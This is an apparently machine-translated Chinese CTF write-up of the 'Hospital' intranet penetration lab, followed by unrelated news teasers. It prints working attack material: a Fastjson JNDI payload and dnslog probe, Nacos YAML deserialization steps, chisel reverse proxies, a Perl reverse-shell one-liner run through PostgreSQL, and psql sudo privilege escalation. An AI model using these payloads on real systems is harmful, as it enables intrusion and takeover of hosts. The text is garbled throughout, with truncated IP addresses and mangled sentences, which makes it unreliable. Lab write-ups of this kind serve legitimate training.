内网渗透——春秋云镜篇医院

发布于:2024-10-24 编辑:匿名 来源:网络

原文经作者授权发表。首次发布于:Prophet Community-jar heapdump_tool.jar “heapdump”。

我搜索了关键词passowrd、shiro、key等,没有数据库账户密码。钥匙被泄露了。

没想到是不是工具的问题,就换了一个工具,用了JdumpSpider。 / -user root -perm --print 2>/dev/null 找到vim,直接猜出flag位置。

代码语言:javascript copy vim /root/flag/flag01.txt 内网检测在线VIPER信息采集上传 fscan进行内网网段扫描 代码语言:javascript copy meterpreter > shell -c './fscan -h .30.12.5/ 24' ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan版本:1.8.3start infoscantrying RunIcmp2当前用户权限无法发送 icmp 数据包start ping(icmp) Target .30.12.6 is alive(icmp) Target .30.12.5 is alive(icmp) Target .30.12 is alive[*] Icmp is alive。主机长度为: .30.12.:22 open.30.12 .5:22 open.30.12.:open.30.12.5:open.30.12.6:open.30.12.6:open.30.12.6:open.30.12.6:open.30.12.:open[*] 活动端口 len 为:9start vulscan[*] NetBios .30.12.6 WORKGROUP\SERVER02 [*] NetInfo [*].30.12.6 [->]Server02 [ ->].30.12.6[*] WebTitle 代码:len:0 title:无 跳转 url: WebTitle 代码:len: title:医疗管理后端[*] WebTitle 代码:len: title:HTTP 状态 – 未找到[* ] WebTitle code:len: title: 医院后台管理平台 [+] PocScan poc-yaml-alibaba-nacos [+] PocScan poc-yaml-alibaba-nacos-v1-auth-bypass [+] PocScan poc-yaml-spring- Actuator -heapdump-file代理构建VPS端代码语言:javascript copy ./chisel server -p -反向目标机器代码语言:javascript copy ./chisel client .3..:R:0.0.0.0::socks 攻击域用户一(nacos Yaml反序列化)信息泄露 Fscan扫描结果中发现代码语言:javascript copy [+] PocScan poc-yaml-alibaba-nacos [+] PocScan poc-yaml-alibaba-nacos-v1-auth-bypass 所以尝试用户登录绕过漏洞并成功获取账户密码,然后尝试编写用户test登录成功。

然而,这些还不足以实现RCE,而且后端什么也没有。搜索相关漏洞,发现两个,一个是内存马注入,另一个是Yaml尝试反序列化内存时,尝试使用工具写入内存。

如果内存没有写入,很可能是Yaml反序列化的原因。尝试使用 src/artsploit/AwesomeScriptEngineFactory.javajar -cvf yaml-payload.jar -C src/ 的 Yaml 反序列化攻击工具。

在Nacos中,发现dataid是db-config,写入其中,然后如果使用Jar路径,我们需要在这里上传。去目标机,因为这台目标机无法出网,我们只能允许它访问内网,所以我们需要先将jar包放入目标机,然后在目标机上开启http服务机器。

这里我们成功收到了echo,说明确实存在Yaml反序列化漏洞,但是我们需要更改yaml-payload中的Java文件。可以看到这本来就是一个计算器,没有任何作用。

我们改为添加管理员用户并在更改后保存。然后打成jar包。

代码语言:javascript copy javac src/artsploit/AwesomeScriptEngineFactory.javajar -cvf yaml-payload.jar -C src/。同样,将jar包上传到目标机器上,再次输入。

现在您可以通过 RDP 连接到攻击域。用户2(Fastjson)从Mimikatz收集信息,发现密码都在工作组中。

漏洞检测:我们还在Fscan中发现了另一种Web服务的代码语言:javascript copy [*] WebTitle code:len: title:医院后台管理平台访问。使用 dirsearch 扫描目录并查找文档、示例。

访问文档并查看 Tomcat。此版本的 Tomcat 存在文件包含漏洞。

如果有上传点,就可以实现文件包含,从而达到RCE的目的(以前的射击场的想法)。但是这里的标题描述中提到了fastjson。

让我们抓住它的包并在内容中只写一个 { 。如果是Fastjson,不完整的时候就会出现Fastjson。

出现Fastjson,说明确实是Fastjson。接下来使用dnslog检测是否存在漏洞代码语言:javascript copy {"qwq":{"@type":"java.net.Inet4Address","val":"4mmi9n.dnslog.cn"}}并成功收到回显,说明Fastjson存在漏洞。

接下来利用该漏洞,使用工具jndi_tool.jar部署恶意类(部署在目标机器上,因为域成员可能无法连接互联网),工具链接 "a":{ "@type":"java .lang.Class", "val" :"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":" .30.12.5:/Object", "autoCommit":true }} 成功收到shell,并且是root权限攻击域用户三(Grafana+psql)。收集信息 ifconfig 发现多个网卡。

上传Fscan扫码语言: javascript copy root@web03:/# ./fscan -h .30.54./24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\ \_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan版本:1.8.3start infoscan( icmp) 目标 .30.54. 处于活动状态(icmp) 目标 .30.54.12 处于活动状态[*] Icmp 活动主机长度为: .30.54.:open.30.54.12:22 open.30.54.: 22 打开.30.54.12:打开.30.54.12:打开.30.54.:open[*] alive ports len is: 6start vulscan[*] WebTitle code:len: title:医院后台管理平台[*] WebTitle code:len:29 title:None 跳转网址: WebTitle code:len:9 title :Grafana发现了另一个域用户,但这和之前的网段不同,所以我们需要搭建多层代理。我们的第一层代理是用VPS作为服务器,外网目标机作为客户端搭建的。

是的,那么我们在搭建第二层的时候,就使用外网目标机作为服务器,然后使用域用户2作为客户端。此时多层代理代码语言实现为:javascript复制VPS->外网目标机->域用户2->域用户3,所以然后直接在外网目标机上搭建服务器,指令为代码语言如下: javascript copy./chisel server -p --reverse 然后在域用户2上构建客户端 代码语言: javascript copy ./chisel client .30.12.5:R:0.0.0.0::socks 此时,代码语言设置为:javascript复制外网->.3..:(VPS)->.30.12.5:(域用户2)->.30.54.12(域用户三)我们更改了配置文件然后尝试curl用户三成功。

在Windows中,使用Proxifier挂起代理链,尝试访问域用户三漏洞检测登录框。一定要尝试弱密码。

使用admin登录成功,admin,利用漏洞,搜索相关漏洞,发现CVE-8。使用该工具直接提取敏感信息。

工具链接exp -u“xxx”。需要注意的是,我用域用户2执行命令。

使用本机然后通过代理执行经常会卡住。获取 PostgreSQL 账户代码语言: javascript copy postgres:Postgres@ 使用 Proxifier 全局代理连接数据库,并使用 Navicat 代码语言查询数据库版本: javascript copy select version();知道数据库是8.1版本,那么更改 root 用户密码搜索相关版本并找到,所以我们在这里调用相关命令,然后使用命令执行来实现反弹shell。

这里的反弹shell反弹到我们的域用户二,因为他和域用户三在同一个网段下。我们先听听。

其港口之一。然后在 Navicat 上执行以下代码语言: javascript copy select system('perl -e \'use Socket;$i=".30.54.";$p=5;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp " ));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S ");exec("/bin/sh -i");};\'');通过 python3 -c 'import pty;pty.spawn("/bin/bash")' 成功反弹 shell 并进行交互 Shell 权限提升,但目前只是普通权限。

权限需要升级。通过执行sudo -l,我们发现psql引用的是/usr/local/postgresql/bin/psql。

代码语言:javascript copy root=# \?!/bin/bash# 需要输入。唯一的就是 \?和!/bin/bash,即可获得root权限。

获取root/flag目录中的flag。人们是安全的,知道什么是错的,并保留什么是错的。

手中有剑,心中有安全。主要研究方向包括:Web、内联网、红蓝对抗、代码审计、Android逆向工程、CTF。

内网渗透——春秋云镜篇医院

站长声明

版权声明:本文内容由互联网用户自发贡献,本站不拥有所有权,不承担相关法律责任。如果发现本站有涉嫌抄袭的内容,欢迎发送邮件 举报,并提供相关证据,一经查实,本站将立刻删除涉嫌侵权内容。

标签:

相关文章

  • 转转牵头投资建立B2B二手交易平台“菜货侠”,深度探索二手手机产业链

    转转牵头投资建立B2B二手交易平台“菜货侠”,深度探索二手手机产业链

    据投资界11月27日消息,领先的二手交易平台转转在中国,宣布联手线上二手回收平台Flash Recycling以及齐跃、一品等国内领先供应链企业共同投资成立公司,正式上线B2B二手交易平台“彩火霞”。 据了解,新公司将由转转控股并独立运营,联合创始人、副总裁、相昌峰担任新公司的

    06-18

  • Acciona Energia计划在昆士兰州建设600MW光伏电站

    Acciona Energia计划在昆士兰州建设600MW光伏电站

    据报道,西班牙可再生能源巨头Acciona Energia近日表示,已为其规划中的澳大利亚昆士兰州兆瓦级光伏电站签署了供电协议。 拟在该州格拉德斯通地区建设一个3GW大型绿色氢能项目来提供电力。 Acciona表示,昆士兰州政府已批准该公司Aldoga光伏电站的土地,该电站将为昆士兰州政

    06-08

  • 新光维医疗完成近4亿元B轮融资,重点关注内窥镜等医疗器械

    新光维医疗完成近4亿元B轮融资,重点关注内窥镜等医疗器械

    投资社区(ID:pedaily)据8月5日消息,新光维医疗今日宣布获得近4亿元A轮融资B融资。 本轮投资投资者包括Hudson Bay Capital Management、Prime Capital等新投资机构,现有股东Hillhouse Ventures、礼来亚洲基金、经纬中国等继续支持公司。 本轮融资将继续用于内窥镜及相关领

    06-18

  • 杭州5G产学研融合创新园启动

    杭州5G产学研融合创新园启动

    国内首个5G全覆盖、5G产学研条件齐全的创新园——中国(杭州)5G创新园在杭州余杭正式启动。 创新园旨在推动5G在智慧城市、智能网联汽车、工业互联网、社会服务等多个领域的融合应用和创新发展,打造5G创新高地。 5G作为新一代移动通信技术的发展方向,以其高速率、低时延、大

    06-06

  • 一年三轮融资,中银微电子获超亿元B轮融资

    一年三轮融资,中银微电子获超亿元B轮融资

    投资界(ID:pedaily)据1月2日消息,中银微电子宣布完成超亿元B轮融资元。 本轮融资由国投创投领投,老股东卓远资本等持续加大投资。 本次融资所筹资金将进一步用于企业级高速接口IP和Chiplet产品的研发,加速Chiplet产品的快速落地和人才引进。 中银微电子作为重大引进项目

    06-18

  • 知识产权质押信息平台将于近期上线

    知识产权质押信息平台将于近期上线

    国家发改委新闻发言人金贤东19日在例行新闻发布会上透露,知识产权质押信息平台已经建成,将于近期正式上线未来。 平台坚持公益性服务原则,将免费向社会公众提供知识产权质押登记信息、金融产品信息、企业信用信息查询、知识产权业务导航等综合服务。

    06-17

  • 晶芯生物完成近亿元天使轮融资,主导开发视觉诊疗一体化靶向核药物

    晶芯生物完成近亿元天使轮融资,主导开发视觉诊疗一体化靶向核药物

    晶芯生物医学科技(南京)有限公司(以下简称“晶芯生物”) 》)宣布完成近亿元天使轮融资 该轮融资由高榕资本领投,投资方包括VI Ventures、骊宸 Capital和老股东凯泰 Capital。 本轮融资将主要用于加速晶芯生物在研的多个创新靶向核药物推进至临床阶段,升级其核药物研发平

    06-18

  • 【创业24小时】2024年5月28日

    【创业24小时】2024年5月28日

    产业巨头公司爱优腾芒B2024年5月28日一季报:提升效率,求“执行力” 点击查看小红书电商店直播,买手的两项业务运营和商户运营合并。 点击查看叮咚买菜连续六个季度盈利。 前端仓库模式运行是否顺利?点击查看本地生活数据“自热火锅”:降价清仓卖不出去。 自热火锅为何会变

    06-18

  • 新项目NO.34|独家专访美克盛能源副总裁胡金双:数字能源与储能安全领域的“双独角兽”

    新项目NO.34|独家专访美克盛能源副总裁胡金双:数字能源与储能安全领域的“双独角兽”

    随着人类社会的电气化、信息化,我们在享受人类社会所取得的成就的同时科学技术,我们也在享受科学技术的成果。 承担温室效应和气候变化的成本。 大自然向人类发出了预警。 在“双碳”目标背景下,绿色能源如何惠及大众?如何创造更安全的绿色能源生活?本期《看见新项目》专

    06-18

  • 曾估值18亿,刘诗诗和赵丽颖投资的公司赴港IPO

    曾估值18亿,刘诗诗和赵丽颖投资的公司赴港IPO

    明星,刘诗诗的“高聘礼”即将上市。 7月20日,江苏稻草熊影业股份有限公司(以下简称“稻草熊影业”)向香港联交所提交招股说明书,正式启动上市程序。 招股书显示,稻草熊是一家国产剧制作人和发行商,旗下知名剧目有《蜀山战纪之剑侠传奇》、《局中人》等。 熊影业的投稿之

    06-18

  • 扎克伯格希望以 499 美元的价格,用最新的 VR 耳机来挑战 Apple

    扎克伯格希望以 499 美元的价格,用最新的 VR 耳机来挑战 Apple

    Quest 如果不出意外的话,将会发生一些事情。 这个经典的网络迷因也发生在 Meta 身上。 北京时间9月28日凌晨,Meta Connect大会原定于凌晨1点开始直播。 但不知为何推迟了30分钟,上演了一出“重新定义凌晨1点”的大戏。 作为当天发布会的主角的最新VR头戴设备Quest 3,扎克伯

    06-18

  • 炙手可热的金融科技该如何面对机遇与挑战?

    炙手可热的金融科技该如何面对机遇与挑战?

    9月15日22时04分09秒,长征二号FT2火箭将天宫二号空间实验室升空,冲向太空。 飞行器进入预定轨道后,空间实验室任务总指挥弗拉基米尔张又侠宣布,发射任务取得圆满成功!天宫二号是我国第一个真正的空间实验室。 它的设计寿命为两年。 为满足中期居住需求,载人居住环境得到

    06-17